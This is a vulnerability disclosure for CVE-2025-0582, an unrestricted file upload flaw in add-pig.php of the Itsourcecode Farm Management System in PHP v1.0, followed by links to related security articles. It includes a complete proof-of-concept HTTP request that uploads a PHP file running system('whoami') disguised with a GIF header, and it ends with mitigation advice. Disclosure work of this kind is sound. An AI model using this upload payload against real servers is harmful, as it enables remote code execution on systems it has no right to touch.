CVE-2025-0582

Itsourcecode Farm Management System In PHP v1.0 add-pig.php Unrestricted Upload

NAME OF AFFECTED PRODUCT(S)

  • Farm Management System In PHP

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • zzz,xiongbaojiang

Vulnerable File

  • add-pig.php

VERSION(S)

  • V1.0

PROBLEM TYPE

Vulnerability Type

  • Unrestricted Upload

Root Cause

In the add-pig.php file of the "Farm Management System In PHP" project, attackers can upload malicious code files through the parameter $res1_name. Due to the lack of proper validation and sanitation of the uploaded files, attackers are able to directly upload malicious files to the server, leading to the risk of arbitrary code execution.

Vulnerability Path

In the add-pig.php file of the "Farm Management System In PHP" project, attackers can upload malicious code files through the parameter $res1_name. Due to the lack of proper validation and sanitation of the uploaded files, attackers are able to directly upload malicious files to the server, leading to the risk of arbitrary code execution.

Key Parameter:

  • Parameter : $res1_name

  • File Name : farm management system/add-pig.php

  • Line Number: 37

    复制代码
    $res1_name = basename($_FILES['pigphoto']['name']);

File Upload:

  • Trigger Path: Arbitrary File Upload/Write

  • File Name : farm management system/add-pig.php

  • Line Number: 45

    move = move_uploaded_file(tmp_name, location.res1_name);

Vulnerability POC

复制代码
POST /farm123/add-pig.php HTTP/1.1
Host: farm
Content-Type: multipart/form-data; boundary=---------------------------85676068117477891701865867569
Content-Length: 1468

-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigno"

pig-fms-2793
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="weight"

1
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="arrived"

2024-12-17
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="gender"

male
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="status"

active
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="breed"

23
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="remark"

1
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigphoto"; filename="test.php"
Content-Type: application/octet-stream

GIF89a;

<?php 
system('whoami');
?>
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="submit"


-----------------------------85676068117477891701865867569--

Payload:

复制代码
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigphoto"; filename="test.php"
Content-Type: application/octet-stream

GIF89a;

<?php 
system('whoami');
?>

The following are screenshots of some specific information obtained from testing and running with the yakit tool:


复制代码
/uploadfolder/test.php

Recommendations for Vulnerability Mitigation

  1. File Type Validation: Limit the allowed file types (e.g., only allow image formats) before processing uploads.
  2. File Name Sanitization: Clean and rename uploaded files to avoid using user-provided names directly.
  3. Use Temporary Directory: Store uploaded files in a temporary directory and conduct security checks after processing.
  4. Permission Control: Ensure correct permission settings on the upload directory to prevent direct execution of uploaded files.
  5. Input Validation: Rigorously validate all user inputs to ensure security.
相关推荐
嗨丶王哪跑4 小时前
网络安全主动防御技术与应用
运维·网络·安全·web安全
火白学安全8 小时前
《Python红队攻防脚本零基础编写:入门篇(一)》
python·安全·web安全·网络安全·系统安全
好家伙VCC8 小时前
**发散创新:渗透测试方法的深度探索与实践**随着网络安全形势日益严峻,渗透测试作为评估系统安全的
java·python·安全·web安全·系统安全
人邮异步社区9 小时前
内网攻防实战图谱:从红队视角构建安全对抗体系
网络·安全·web安全
携欢18 小时前
PortSwigger靶场之CSRF where token validation depends on request method通关秘籍
安全·web安全·csrf
周杰伦_Jay18 小时前
【计算机网络表格图表解析】网络体系结构、数据链路层、网络层、传输层、应用层、网络安全、故障排查
计算机网络·安全·web安全
独行soc1 天前
2025年渗透测试面试题总结-106(题目+回答)
网络·python·安全·web安全·adb·渗透测试·安全狮
A Runner for leave1 天前
网络与通信安全课程复习汇总1——课程导入
网络·安全·web安全
KKKlucifer1 天前
生成式 AI 冲击下,网络安全如何破局?
网络·人工智能·web安全
Suckerbin1 天前
Monitoring: 1靶场渗透
笔记·安全·web安全·网络安全